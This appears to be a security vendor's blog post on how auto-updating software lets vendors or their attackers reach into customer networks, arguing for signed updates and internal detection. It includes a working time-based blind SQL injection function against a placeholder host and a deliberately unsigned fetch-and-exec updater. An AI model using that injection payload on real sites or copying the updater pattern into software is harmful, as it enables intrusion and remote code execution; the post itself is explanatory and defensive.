If I run your software, can you hack me?

In our previous post (Are Canaries Secure?) we showed (some of) the steps we’ve taken to harden Canary and limit the blast radius from a potential Canary compromise. Colloquially, that post aimed to answer the question: “Are Canaries secure?”

This post takes aim at another question that pops up periodically: “If I run your Canaries on my network, can you use them to hack me?”

The answer to this one is a little more complicated than the first, as there is some nuance. (Because my brutally honest answer is: “yeah… probably”.)

But this isn’t because Canary gives us special access; it’s true because most of your other vendors could do it too. If you run software with an auto-update facility (and face it, auto-updates are the gold standard these days), then the main thing stopping that vendor from using that software to gain a foothold on your network is a combination of the vendor’s imagination, ethics, and discomfort with the size of jail cells. It may not be a comfortable fact, but the fact remains true with no apparent appreciation for our comfort levels.

Over a decade ago we gave two talks on tunneling data in and out of networks through all sorts of weird channels (the pinnacle was a remote timing-based SQL injection used to carry TCP packets to internal RDP machines): “It’s all about the timing” and “Pushing the Camel through the Eye of the Needle”.
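
To make the trick concrete, here’s a minimal sketch (in Python, and emphatically not the original tooling) of the core move behind timing-based extraction: ask the server a yes/no question via injected SQL, and read the answer off the clock. The endpoint and payload are entirely hypothetical.

```python
import time
import urllib.parse
import urllib.request

TARGET = "http://victim.example/item?id="  # hypothetical injectable parameter
SLOW = 2.0  # seconds; anything slower than this reads as a 1

def read_bit(condition: str) -> int:
    """Infer one bit: if `condition` is true, the injected SQL sleeps server-side."""
    payload = urllib.parse.quote(f"1 AND IF(({condition}),SLEEP(3),0)")
    start = time.monotonic()
    try:
        urllib.request.urlopen(TARGET + payload, timeout=10).read()
    except OSError:
        pass  # even error responses carry timing information
    return 1 if time.monotonic() - start > SLOW else 0

# e.g. the top bit of the first character of the current DB user:
# read_bit("ASCII(SUBSTRING(USER(),1,1))&128")
```

Chain enough of those bits together and you have a (slow) bidirectional transport; that’s all the TCP-over-SQL-injection trick really was.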


The point is that with a tiny foothold we could expand pretty ridiculously. Sending actual code down to software that’s already running inside an organization is like shooting fish in a barrel. This doesn’t just affect appliances or devices on your network; it extends to any software.
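
To see why it’s so easy, consider what an auto-updater is once you strip away the ceremony: code that fetches more code and runs it. A deliberately naïve sketch (the URL is hypothetical, and signature checks are conspicuously absent):

```python
import urllib.request

UPDATE_URL = "https://updates.vendor.example/latest.py"  # hypothetical endpoint

def auto_update() -> None:
    # Fetch whatever the vendor (or whoever controls the vendor's update
    # server) published today, and run it with this process's privileges.
    code = urllib.request.urlopen(UPDATE_URL).read()
    exec(compile(code, UPDATE_URL, "exec"))
```

Real updaters add signing and staged rollouts on top, but that only narrows who can use the channel; it doesn’t change what the channel is.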

Consider VLC, the popular video player. Let’s assume it’s installed on your typical corporate desktop. Even if you reversed the hell out of the software to be reasonably sure that the posted binaries aren’t backdoored (which you didn’t), you have no idea what last night’s auto-update brought down with it. 

You don’t allow auto-updates? Congratulations, you now have hundreds of vulnerable video players waiting to be exploited by a random video of cats playing pianos. 

This ignores the fact that even if the video player never downloads malicious code, there’s always the possibility that it downloads vulnerable code, which then becomes the hole through which the player is exploited.

It’s turtles all the way down.

So what does this mean? Fundamentally, it means that if you run software from a third-party vendor that accepts auto-updates (and you do), you are accepting the fact that this vendor (or anyone who compromises them) can probably pivot from the internet to a position on your network.

Chrome has successfully popularised the concept of silent auto-updates, and it’s a good thing, but it’s worth keeping in mind what we give up in exchange for the convenience. (NB. We’re not arguing against auto-updates at all; in fact, we think you’d be remiss not to enable them.)
You can mitigate this in general by disabling updates, but that opens you up to a new class of problems with only a handful of solutions:
  • A new model of computation – You could move to Chromebooks or really limited end-user devices. But remember: no third-party Chrome apps or extensions, or you fall into the same trap.
  • You can be more circumspect about whose software you run. Ultimately, the threat of legal action is what provides the boundaries for contracts and business relationships, and that goes a long way in building trust in third parties. If you have a mechanism to recover damages from (or lay charges against) a vendor for harmful actions, you’ll be more likely to give their software a try. But this still ignores the risk of a vendor being compromised by an unrelated attacker.
  • You can hope to detect when the software you don’t trust does something you don't expect.
For the second solution, software purchasers can demand explanations from their vendors of how code enters the update pipeline and how its integrity is maintained along the way. We’ve discussed our approach in a previous post. (It’s also why we believe that customers should be more demanding of their vendors!)
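
What does a good answer look like? At minimum: releases signed offline, and clients that refuse any update that doesn’t verify against a key pinned at install time. A minimal sketch, assuming Ed25519 signatures and Python’s cryptography package (the pinned key here is a placeholder):

```python
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey

# 32-byte raw public key shipped with the initial install (placeholder value).
PINNED_VENDOR_KEY = b"\x00" * 32

def update_is_genuine(package: bytes, signature: bytes) -> bool:
    """Return True only if `package` verifies against the pinned vendor key."""
    try:
        Ed25519PublicKey.from_public_bytes(PINNED_VENDOR_KEY).verify(signature, package)
        return True
    except InvalidSignature:
        return False  # refuse to install; whatever this is, the vendor didn't sign it
```

Of course, this only tells you the vendor’s key signed the update; it says nothing about what the update does, which is rather the point of this post.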

The last solution is interesting. We’re obviously huge fans of detection, and previous posts even mention how we detect if our Consoles start behaving unusually. On corporate networks, where the malicious software could be your office phones or your monitors or the lightbulbs, pretty much your only hope is having some way of telling when your kettle is poking around the network.

Ages ago, Marcus Ranum suggested that a quick diagnostic when inheriting a network would be to implement internal network chokepoints (and to then investigate connections that get choked). We (obviously) think that dropping in Canaries is a quick, painless way to achieve the same thing.
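
The chokepoint idea doesn’t need much machinery. Here’s a minimal sketch of its spirit: listen on a port nothing legitimate should touch, and complain loudly when something connects. (A real Canary does considerably more than this, of course.)

```python
import socket
from datetime import datetime, timezone

def watch(port: int = 3389) -> None:  # pose as RDP, say
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen()
    while True:
        conn, (host, _) = srv.accept()
        print(f"{datetime.now(timezone.utc).isoformat()} connection from {host} "
              f"to port {port} -- nothing should be talking to this")
        conn.close()

if __name__ == "__main__":
    watch()
```

Anything that trips it is, by construction, worth investigating.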

It's trite, but still true: until there are fundamental changes to our methods of computation, our only hope is to “trust, but verify”. On that note, we try hard to be part of the solution instead of the problem.

